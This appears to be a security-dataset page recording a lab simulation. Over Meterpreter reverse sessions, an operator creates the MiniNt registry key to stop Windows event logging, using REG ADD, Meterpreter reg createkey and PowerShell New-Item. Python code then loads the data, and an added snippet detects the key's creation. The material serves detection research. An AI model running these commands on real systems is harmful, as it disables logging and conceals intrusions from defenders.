Stopping Event Logging via Creation of MiniNt Registry Key#

Metadata#

Contributors: Jose Rodriguez @Cyb3rPandaH

Creation Date: 2022/08/03

Modification Date: 2022/08/03

Tactics: TA0005

Techniques: T1562.002

Tags: reg, powershell, eventlog, minint

Dataset Description#

After obtaining an elevated Meterpreter session, we added the MiniNt registry key under both HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control and HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control. After rebooting the system and trying to access event logs through the Event Viewer application, we got the following message: "Event Viewer cannot open the event log or custom view. Verify that Event Log service is running or query is too long. The request is not supported (50)." We simulated this attack using 3 different procedures: the REG command via cmd.exe, the REG Meterpreter command (Metasploit), and the PowerShell module (Metasploit). These datasets describe the before-rebooting phase of the simulation, and they were generated on a Windows 10 Pro Evaluation edition (Version: 1903, OS Build: 18362.30).

Simulation Metadata#

Tools#

| type   | Name       | Module     |
|--------|------------|------------|
| Manual | cmd        | cmd        |
| Manual | Metasploit | reg        |
| Manual | Metasploit | powershell |

Adversary View#

**Using reg command via cmd.exe:**

msf6 exploit(multi/handler) > run 

[*] Started HTTPS reverse handler on https://192.168.56.40:8443 
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: vtlafkal) Staging x64 payload (201308 bytes) ... 
[*] Meterpreter session 11 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-03 22:22:26 -0400 

meterpreter > shell 

Process 8784 created. 
Channel 1 created. 
Microsoft Windows [Version 10.0.18362.30] 
(c) 2019 Microsoft Corporation. All rights reserved.  

C:\Users\IT01-Pedro\Downloads>REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt 

REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt 
The operation completed successfully. 

C:\Users\IT01-Pedro\Downloads> 

**Using reg meterpreter command:**

msf6 exploit(multi/handler) > run 

[*] Started HTTPS reverse handler on https://192.168.56.40:8443 
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: y2cffmed) Staging x64 payload (201308 bytes) ... 
[*] Meterpreter session 5 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-03 19:01:55 -0400       

meterpreter > reg createkey -k 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt' 

Successfully created key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt 

meterpreter > 

**Using PowerShell module:**

msf6 exploit(multi/handler) > run 

[*] Started HTTPS reverse handler on https://192.168.56.40:8443 
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: 9203cnga) Staging x64 payload (201308 bytes) ... 
[*] Meterpreter session 9 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-03 19:43:05 -0400 

meterpreter > load powershell 

Loading extension powershell...Success. 

meterpreter > powershell_execute "New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Control\MiniNt" 

[+] Command execution completed: 

    Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control 

Name                           Property 
----                           -------- 
MiniNt 

meterpreter > 

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

# The dataset URL must be a string literal; the original line was missing the quotes.
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_stop_event_logging_controlset_minint_key.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()
# Unzip in memory and extract the first (and only) JSON file to the working directory.
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

import pandas as pd

# The dataset is newline-delimited JSON (one event per line).
df = pd.read_json(datasetJSONPath, lines=True)

Access Security Events#

# Count events per log channel to see which providers captured the simulation.
df.groupby(['Channel']).size().sort_values(ascending=False)
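As an added detection example (not part of the original notebook or the OTRF dataset code), the following scans exported events for creation of the MiniNt key under any ControlSet, as described in the dataset description above. It assumes Sysmon Event ID 12 (RegistryEvent: object create/delete) records with the fields Channel, EventID, EventType, Image and TargetObject; the sample records are constructed here, not taken from the dataset.

```python
import re

# Constructed sample events (not from the page's dataset). Field names follow
# Sysmon Event ID 12 (RegistryEvent) as an assumption about the exported JSON.
SAMPLE_EVENTS = [
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 12,
     "EventType": "CreateKey", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\MiniNt"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 12,
     "EventType": "CreateKey",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetObject": "HKLM\\System\\ControlSet001\\Control\\MiniNt"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 12,
     "EventType": "DeleteKey", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\MiniNt"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 13,
     "EventType": "SetValue", "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\MiniNt\\Foo"},
    {"Channel": "Security", "EventID": 4688,
     "Image": "C:\\Windows\\System32\\reg.exe", "TargetObject": ""},
]

# The MiniNt key directly under the Control key of CurrentControlSet or any
# ControlSet00N (the simulation touched both CurrentControlSet and ControlSet001).
MININT_KEY = re.compile(
    r"^HKLM\\SYSTEM\\(CurrentControlSet|ControlSet\d{3})\\Control\\MiniNt$",
    re.IGNORECASE,
)


def find_minint_key_creation(events):
    """Return (Image, TargetObject) pairs for Sysmon key-creation events on MiniNt.

    Only Event ID 12 with EventType 'CreateKey' counts; deletions, value writes
    (Event ID 13) and events from other channels are ignored.
    """
    hits = []
    for ev in events:
        if ev.get("Channel") != "Microsoft-Windows-Sysmon/Operational":
            continue
        if str(ev.get("EventID")) != "12" or ev.get("EventType") != "CreateKey":
            continue
        target = ev.get("TargetObject", "") or ""
        if MININT_KEY.match(target):
            hits.append((ev.get("Image", ""), target))
    return hits


if __name__ == "__main__":
    for image, key in find_minint_key_creation(SAMPLE_EVENTS):
        print(f"MiniNt key created by {image}: {key}")
```

Sysmon only records the event if its configuration contains a RegistryEvent rule covering this path, and since the key takes effect on reboot, the creation event itself is the last reliable signal before logging stops.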